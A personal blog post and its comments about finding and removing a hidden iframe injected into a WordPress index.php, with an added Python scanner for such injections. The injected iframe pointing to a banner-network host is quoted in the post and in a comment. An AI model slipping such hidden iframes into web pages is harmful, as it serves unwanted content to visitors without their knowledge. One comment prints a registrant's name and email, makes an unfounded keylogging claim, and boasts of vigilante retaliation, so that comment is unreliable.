Hacked, Fixed, Email/Feed Issues Resolved
Good Grief
I sent out an email to some of my readers this morning as I noticed my Feed Broadcaster was no longer working, and wanted to make sure it wasn’t just on my end. It wasn’t.
Thanks to everyone who responded, by the way – you guys are great! It was Patty Gale who offered an idea that led to the solution, so I logged into FeedBurner to check things out…
It turns out my feed wouldn’t “validate”. It even told me why, which I didn’t really understand. But it did point out the piece of code causing the problem:
[iframe name="StatPage" src="http://banner-network.hk/ppc/index.php" width=5 height=5 style="display:none"][/iframe]
Hmmm. Now I know I didn’t put that there.
Next Step: do a search on Google using a string of that code to see if anyone else is discussing it online anywhere. I chose |iframe name=”StatPage”| and pasted that into the search bar, which returned this topic on WordPress Support.
Scanning the discussion I see the word “hacked” (not good). Keep scanning and see the 5th message down, which says:
Check your main index.php file and see if it was modified.
I open my FTP program, log on to my hosting account, look in the root directory, and open the index.php file. Bingo! There it is…
I removed the code, saved the file, and went back to FeedBurner’s troubleshooting section. This time my feed validated (yay!).
In the case that something like this ever happens to you, these troubleshooting steps might come in handy. Don’t panic. Just identify the problem, all of the possible sources of that problem, and search on Google for the solution.
Chances are, nothing will happen to you (or your sites) that hasn’t already happened to someone else first.
To state the obvious, we’re back up and running again. So for those of you that were getting an error in Bloglines, in your feed reader, were missing the email notifications, etc… everything should be working just fine now.
Best,

Tags: hacked, hackers, wordpress, feed validator
















Oh brother. When will people get a life? What a hassle on your end…glad it is fixed, though.
I hear ya!
Unfortunately once everything was “fixed”, the email updates went out in a batch. I was worried that would happen. My apologies for the 3 emails in a row that everyone received tonight!
Follow me @lynnterry on Twitter.
That’s a bit scary, Lynn.
I didn’t get a chance to reply to your last email, but I thought it was strange that Feedburner was taking so long to validate the feed. Usually they update in just a few minutes after pinging.
I’m glad to see it’s resolved.
Follow me @pattygaledotcom on Twitter.
Thank you – and thanks again for the suggestions!
Follow me @lynnterry on Twitter.
At least you were able to figure it out and fix it. I would probably be at a total loss of figuring it out.
Soooo …
Someone was trying to run some sort of banner network file through your site, it looks like.
Glad you have it resolved!
Rick Wilson
Follow me @corprebel on Twitter.
It would appear so – though it was invisible. How sneaky is that – racking up impressions to provide stats to paying advertisers
Follow me @lynnterry on Twitter.
Ack! Maybe you should have researched the code a little further to try to find out who was benefiting from it and reported them.
A good idea
Follow me @lynnterry on Twitter.
I’d noticed it was causing your blog pages to hang on load … it even happened during your Web conference yesterday (when you loaded one of your pages to point something out).
Didn’t realise the code was nefarious … glad you could sort it out.
I didn’t even associate the two, Andy… but you’re right – the mysterious error is gone, so that must have been the case. Thank goodness, because I’m not sure I would have known where to start tracking that down otherwise.
Follow me @lynnterry on Twitter.
Hi Lynn,
Here are some stats and info on that problem causer.
The domain the file is associated with running is registered with:
https://www.hkdnr.hk/
From HK (hong kong)
Their Account Name: HK1917076T
First name: TIM
Last name: FLOCK
Company Name: TIM FLOCK
DNS:
NS1.BANNER-NETWORK.HK
NS2.BANNER-NETWORK.HK
NS3.BANNER-NETWORK.HK
Chinese Holder:
john-lawson1956@doglover.com
Spoofed Registration:
21-06-2007
in this code:
[iframe name=”StatPage” src=”http://banner-network.hk/ppc/index.php” width=5 height=5 style=”display:none”][/iframe]
Iframe Name is specifying an action from the file index.php, located in the ppc/ directory.
My guess is StatsPage is made to do two things: 1, track input types on the page this was inserted, and 2, track results and cookie tracking. I highly recommend anyone who has resulted with this in their index file please clean your cookies; there can be a tracking (keylog) cookie inside this index.php file. I have (spoofed getting it) and found this out.
Glad to help out!.
And actually I had a rough attack from Japan, spoofing every address possible at webdevelopmenttechnology.com. I had over 300 messages sent with out server, I blocked every single one. BUT, lol, if you ain’t got good money, it will be useless to report them, and try to sue or get them jailed. Japan, I even had the address of the fart who done it. I just done some personal justice, he won’t be doing it again.
Thank you, Chris! Appreciate the detective work there, and will certainly take your advice
Follow me @lynnterry on Twitter.
Lynn,
This is pretty serious, even though it was solved easily. Either your server was hacked, your WordPress install was hacked, or you have a worm or trojan on YOUR computer. Personally, I’d lay odds it’s one of the first two.
Use a decent search utility and scan your local files for the text used in the iframe. If it appears on your computer in a file, try to determine where the file came from. This will give a clue as to whether you received the file with the iframe in it, or if it was modified after it hit your computer. Regardless of what you find, I would do a full system scan with a GOOD antivirus/spyware scanner, and sooner rather than later.
Change your admin password for WordPress, and back up your database. It wouldn’t hurt to change your database access password either (you’ll have to update the configuration files for whatever scripts you have that access the db).
Ask your hosting company for assistance. They may be able to help you determine when/where/how the changes in the file were made.
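An added example (not part of the original post or of any comment): the manual check of index.php from the post and the file scan suggested in the comment above, generalised into a scan of a downloaded copy of the site for iframes that are hidden or tiny and load from another host. The file-extension list, the 10-pixel threshold and the `own_hosts` allowlist are assumptions of this sketch; the sample is constructed from the snippet quoted in the post.

```python
import re
import sys
from pathlib import Path
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
HIDDEN_CSS_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
TINY_RE = re.compile(r"\s*(?:\d|10)\s*(?:px)?\s*$")  # assumption: 0-10 px is not meant to be seen
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js", ".tpl", ".inc"}

SAMPLE = (  # constructed: the snippet from the post as real HTML, plus a normal visible embed
    '<?php /* index.php */ ?>\n'
    '<iframe name="StatPage" src="http://banner-network.hk/ppc/index.php" '
    'width=5 height=5 style="display:none"></iframe>\n'
    '<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>\n'
)

def parse_attrs(raw):
    """Return iframe attributes as a lower-cased dict (quoted or unquoted values)."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(raw)}

def suspicious_iframes(text, own_hosts=()):
    """Return src URLs of iframes that are hidden or tiny AND load from another host."""
    text = text.replace('\\"', '"').replace("\\'", "'")  # unescape quotes in PHP echo strings
    hits = []
    for m in IFRAME_RE.finditer(text):
        a = parse_attrs(m.group(1))
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        hidden = (HIDDEN_CSS_RE.search(a.get("style", ""))
                  or TINY_RE.match(a.get("width", "")) or TINY_RE.match(a.get("height", "")))
        if host and host not in own_hosts and hidden:
            hits.append(src)
    return hits

def scan_tree(root, own_hosts=()):
    """Walk a downloaded copy of the site; map file path -> suspicious iframe URLs."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            if hits := suspicious_iframes(path.read_text(errors="replace"), own_hosts):
                findings[str(path)] = hits
    return findings

if __name__ == "__main__":
    print(scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."))
```

Injections that are obfuscated (for example base64-encoded PHP) will not match this pattern, so a clean result should be backed up by comparing the files against a fresh copy of the same WordPress release.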
Thank you, Steve – I have already changed passwords in many of those locations and am tracking down each FTP account I set up for assistants etc at the moment too.
I just bought a new computer, arrived this morning, so I am going to scan this one, THEN do backups, then reload the O/S to a fresh install, and set up on the new box…
Follow me @lynnterry on Twitter.
Nice for sharing and I will take notice.
I’m having big problems at my yahoo e-mail so I’m moving to gmail…Thank-you P.S. I had 7 years of important e-mails go up into the dust..